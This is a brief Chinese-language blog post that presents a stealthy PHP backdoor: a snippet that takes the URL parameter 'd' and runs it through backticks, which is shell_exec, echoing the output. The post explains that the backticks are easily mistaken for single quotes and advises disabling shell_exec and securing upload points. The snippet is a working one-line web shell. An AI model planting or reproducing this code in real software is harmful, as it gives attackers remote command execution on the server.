一个不易发现的php后门写法 - 可引起执行任意函数
直接上代码,我们直接看一下代码:
$daimagongfang = $_GET['d'];
if (isset($daimagongfang)){
echo `$daimagongfang`;
}
初看下来觉得没什么,不就是个打印字符串吗,只不过输出时变量加了单引号,如何也想不到上升到了,代码工坊小编起初也这么觉得。
其实不然,这里不是简单的英文单引号,它是一个反单引号,实际是函数的简略写法,会引起函数执行。
而这里主要使用到的是函数shell_exec,所以该函数大家一定要及时禁用,防护好各处的上传入口。
下面我们再来放大看一下两个字符的不同。
单引号 → '
反单引号→ `